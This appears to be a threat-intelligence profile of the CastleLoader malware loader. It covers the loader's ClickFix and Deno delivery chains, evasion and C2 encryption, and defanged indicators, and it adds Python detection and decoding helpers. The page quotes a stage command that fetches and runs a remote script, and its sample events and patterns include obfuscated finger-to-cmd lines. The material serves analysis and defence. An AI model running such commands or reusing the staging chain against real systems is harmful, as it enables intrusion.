CastleLoader
CastleLoader is a modular malware loader and malware-as-a-service (MaaS) framework active since at least early 2025 and associated primarily with the threat actor TAG-150, later tracked as GrayBravo. It is used as an initial infection vector to deliver a wide range of secondary payloads, including LummaC2, NetSupport RAT, StealC, RedLine Stealer, Rhadamanthys, DeerStealer, SectopRAT, WarmCookie, HijackLoader, DOILoader, MonsterV2/Aurotun Stealer, and CastleStealer. Reporting also notes links to MuddyWater through shared code-signing certificates, and FakeSet has been observed delivering CastleLoader in recent infections.
Observed delivery methods include ClickFix-style social engineering, fake CAPTCHA and Cloudflare-themed lures, bogus GitHub repositories, malicious installers, and multi-stage chains using Deno or embedded Python runtimes. In one documented chain, CastleLoader was delivered through Inno Setup -> AutoIt -> process hollowing; in others, attackers abused LOLBins such as finger.exe, curl.exe, tar.exe, cmd.exe, and explorer.exe, or used NSIS installers with embedded Python to decrypt and execute CastleLoader shellcode in memory. Campaigns have impersonated free image-editing or background-removal tools, LinkedIn, Indeed, software libraries, browser updates, and document verification systems.
CastleLoader is designed for flexible malware deployment and in-memory task execution. Reported capabilities include host profiling and fingerprinting, collection of username, computer name, domain name, Windows version, architecture, and installed antivirus products, anti-VM and geofencing checks, run-as-admin behavior, screenshot support, fake error display, and prevention of restart. It uses multiple evasion and execution techniques across reports, including heavy obfuscation, API hashing, XOR-encrypted strings, RC4-encrypted payload retrieval, reflective PE loading, direct ntdll system-call usage, process hollowing, ReplaceTextW callback execution, and in-memory shellcode execution. C2 traffic has been described as using RC4 and ChaCha20/ChaCha encryption, with custom serialized tasking containers.
CastleLoader infrastructure has been documented on domains including maybedontbanplease[.]com and trindastal[.]com, with one report identifying maybedontbanplease[.]com as GrayBravo-operated C2 registered on 2026-04-02 and resolving to 38[.]180[.]136[.]139. Other reported infrastructure details include C2 servers commonly exposing functionality on port 80 and admin panels on port 5050, sometimes 9999. Specific indicators mentioned in reporting include the C2 domain maybedontbanplease[.]com, the domain trindastal[.]com, the User-Agent string GoogeBot, the CastleLoader core hash bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92, and the NSIS sample hash 4ba0d3ae41a0ae3143e8c2c3307c24b0d548593f97c79a30c0387b3d62504c31.
Targeting described in public reporting includes government entities, U.S. government agencies, critical infrastructure, IT firms, logistics companies, and multiple other industries. CastleLoader has been characterized as a stealthy first-stage loader used in attacks against government entities and multiple industries, and several distinct activity clusters have been observed leveraging it, reinforcing the assessment that it is offered under a MaaS model.
Groups observed using it
4 distinct threat actors attributed by public researchers.
CastleStealer is a .NET information stealer that was recently distributed alongside CastleLoader through a ClickFix-style lure masquerading as a free image-editing tool as part of a campaign codenamed BackgroundFix.
Another malware family linked to MuddyWater is a downloader called FakeSet, which the security researchers say was used in recent infections to deliver CastleLoader. CastleLoader is sold as a service to multiple affiliates and cyber crews.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (7 techniques)
Victims are tricked into copying and executing malicious PowerShell commands on their own devices, thereby enabling the compromise.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Lastly, the renamed Python interpreter will be used to execute inline Python code.
The following stage is executed with the downloaded Deno executable: ... deno.exe run -A http://{C2}/{random_path}.js
In this case, the bytecode file is another in-memory loader that uses the Windows ctypes interface to execute shellcode received from a local named pipe.
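As an added illustration (not code from the page or from any vendor report), the following Python sketches a process-creation check for the cmd.exe/finger chain and the Deno remote-script launch described above; the sample events, the field names modelled on Sysmon Event ID 1, and the c2-placeholder.invalid host are constructed:

```python
import re

# Constructed process-creation events (not real telemetry); field names follow
# Sysmon Event ID 1. c2-placeholder.invalid stands in for the real C2 host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c f^i^n^g^e^r user@c2-placeholder.invalid | cmd",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\user\AppData\Local\deno\deno.exe",
     "CommandLine": r"deno.exe run -A http://c2-placeholder.invalid/a1b2c3.js",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Temp",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# cmd.exe treats ^ as an escape, so f^i^n^g^e^r runs finger; strip it before matching.
# (Carets inside double quotes are literal in cmd.exe; this coarse strip is fine
# for detection normalisation, not for faithful re-parsing.)
def normalize_cmdline(cmdline: str) -> str:
    return cmdline.replace("^", "").lower()

LOLBIN_PATTERNS = {
    # finger output piped straight into a fresh cmd.exe, as in the reported chain
    "finger_piped_to_cmd": re.compile(r"\bfinger(\.exe)?\b.*\|\s*cmd"),
    # deno run -A (all permissions) on a script fetched over HTTP
    "deno_remote_script": re.compile(r"\bdeno(\.exe)?\s+run\s+-a\s+https?://"),
}

def classify(event: dict) -> dict:
    """Return matched pattern names and whether carets hid the matched command."""
    norm = normalize_cmdline(event["CommandLine"])
    hits = [name for name, pat in LOLBIN_PATTERNS.items() if pat.search(norm)]
    return {"hits": hits, "caret_obfuscated": bool(hits) and "^" in event["CommandLine"]}

def scan(events: list) -> list:
    """Indices of events that triggered at least one pattern, with their verdicts."""
    results = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, v) for i, v in results if v["hits"]]
```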
Persistence (1 technique)
Privilege Escalation (4 techniques)
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Stealth (9 techniques)
The payload downloaded by the renamed Python interpreter is another Python script that performs a Cyrillic substitution operation. Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents.
Infections are most commonly initiated through Cloudflare-themed “ClickFix” phishing attacks or fraudulent GitHub repositories masquerading as legitimate applications. The operators employ the ClickFix technique by leveraging domains that imitate software development libraries, online meeting platforms, browser update alerts, and document verification systems.
This directory is also created under %LocalAppData% and mimics a legitimate Python installation structure, depending on the runtime variant being used (embedded CPython or IronPython).
Embedded JavaScript dynamically fetches remote content from this endpoint, applies ROT13 to decode the response... Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents... using Base64 encoding, XOR decryption... The first 64 bytes of the downloaded blob are treated as the RC4 key... all C2 communication is encrypted via the symmetric ChaCha algorithm.
Despite differences in tooling and runtime selection, both variants follow the same overall execution chain, including LOLBin abuse, portable Python runtime deployment, staged payload retrieval, and in-memory execution of the next-stage malware payload.
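An added analyst helper, not from the page or any cited report, showing two of the decoding layers described above: Cyrillic homoglyph normalisation before Base64 decoding, and RC4 decryption with the first 64 bytes of a blob used as the key. The homoglyph table and the sample blob are assumptions constructed for the demonstration; the real script's substitution list is not given on the page:

```python
import base64

# Assumed homoglyph table: the page says "specific Cyrillic characters" are swapped
# for Latin equivalents but does not list them, so this pairing of look-alike
# glyphs is an assumption, not the real script's table.
CYRILLIC_TO_LATIN = str.maketrans({
    "а": "a", "е": "e", "о": "o", "р": "p", "с": "c", "х": "x", "у": "y",
    "А": "A", "В": "B", "Е": "E", "К": "K", "М": "M", "Н": "H", "О": "O",
    "Р": "P", "С": "C", "Т": "T", "Х": "X",
})

def normalize_and_b64decode(text: str) -> bytes:
    """Undo the Cyrillic-substitution layer, then Base64-decode strictly."""
    return base64.b64decode(text.translate(CYRILLIC_TO_LATIN), validate=True)

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA); symmetric, so one function en/decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def split_rc4_blob(blob: bytes, key_len: int = 64) -> bytes:
    """Treat the first key_len bytes as the RC4 key and decrypt the remainder."""
    if len(blob) <= key_len:
        raise ValueError("blob too short to hold the key plus ciphertext")
    return rc4(blob[:key_len], blob[key_len:])

def build_constructed_sample() -> str:
    """Constructed input (not a real sample): RC4 blob, Base64, Cyrillic swaps."""
    key = bytes(range(64))
    blob = key + rc4(key, b"constructed-sample-payload")
    b64 = base64.b64encode(blob).decode()
    # Swap some Latin letters for Cyrillic look-alikes, as the loader's script expects.
    return b64.replace("a", "а").replace("e", "е").replace("o", "о")
```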
Credential Access (1 technique)
Discovery (3 techniques)
The loader issues a get_tasks request to its C2 server using generated identifiers of the infected host... along with system profiling data (username, computer_name, domain_name, windows_version, arch, active_av and active_list).
Collection (2 techniques)
Command and Control (4 techniques)
The infrastructure linked to TAG-150 includes both victim-facing Tier 1 components, such as IP addresses and domains used as command-and-control (C2) servers for multiple malware families...
For the initial configuration fetch, the malware issues a GET request to a hardcoded base URL... the loader contacts only the base endpoint and transmits encrypted data within the HTTP POST request body.
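As an added hunting example (not from the page or any vendor), a small Python pass over constructed proxy-log lines that flags the GoogeBot User-Agent reported for this family and POST requests to a bare base path that carry a body; the log format, client IPs and the c2-placeholder.invalid domain are constructed:

```python
import re
from urllib.parse import urlsplit

# Constructed proxy-log lines (not real telemetry), space-separated:
# client_ip method url status bytes_out "user-agent"
SAMPLE_LOG = """\
10.0.0.5 GET http://c2-placeholder.invalid/ 200 0 "GoogeBot"
10.0.0.5 POST http://c2-placeholder.invalid/ 200 412 "GoogeBot"
10.0.0.9 GET http://example.com/index.html 200 0 "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.9 POST http://example.com/api/login 200 88 "Mozilla/5.0 (Windows NT 10.0)"
"""

LINE = re.compile(r'^(\S+) (\S+) (\S+) (\d+) (\d+) "([^"]*)"$')
SUSPECT_UA = {"GoogeBot"}  # misspelled Googlebot UA reported for CastleLoader

def parse(line: str):
    """Parse one constructed log line into a dict, or None if malformed."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, url, status, bytes_out, ua = m.groups()
    return {"ip": ip, "method": method, "path": urlsplit(url).path or "/",
            "bytes_out": int(bytes_out), "ua": ua}

def score(rec: dict) -> list:
    """Reasons this record looks like the reported beaconing pattern."""
    reasons = []
    if rec["ua"] in SUSPECT_UA:
        reasons.append("known_bad_user_agent")
    # Config fetch is a GET to the base URL; tasking goes as an encrypted POST body
    # to the same base endpoint, so a POST to "/" with a body is the signal here.
    if rec["method"] == "POST" and rec["path"] == "/" and rec["bytes_out"] > 0:
        reasons.append("post_to_base_path_with_body")
    return reasons

def hunt(log_text: str) -> dict:
    """Map client IP -> set of reasons across all lines that scored."""
    alerts = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec and (r := score(rec)):
            alerts.setdefault(rec["ip"], set()).update(r)
    return alerts
```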
IOCs tracked for this family
117 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
43 sources tracked across advisories, community write-ups, and news.
Loader observed distributing CastleStealer alongside ClickFix-style lures; attributed in the article to the GrayBravo threat activity cluster.
A fileless Malware-as-a-Service loader used in the ClickFix campaign to retrieve configuration, communicate with C2 using ChaCha20 and RC4-based mechanisms, execute tasks, and deliver next-stage payloads including a Python-based RAT.
A malware loader delivered through a Deno-based multi-stage infection chain using the ClickFix lure.
A malware loader observed being delivered through a Deno-based multi-stage infection chain involving the ClickFix lure.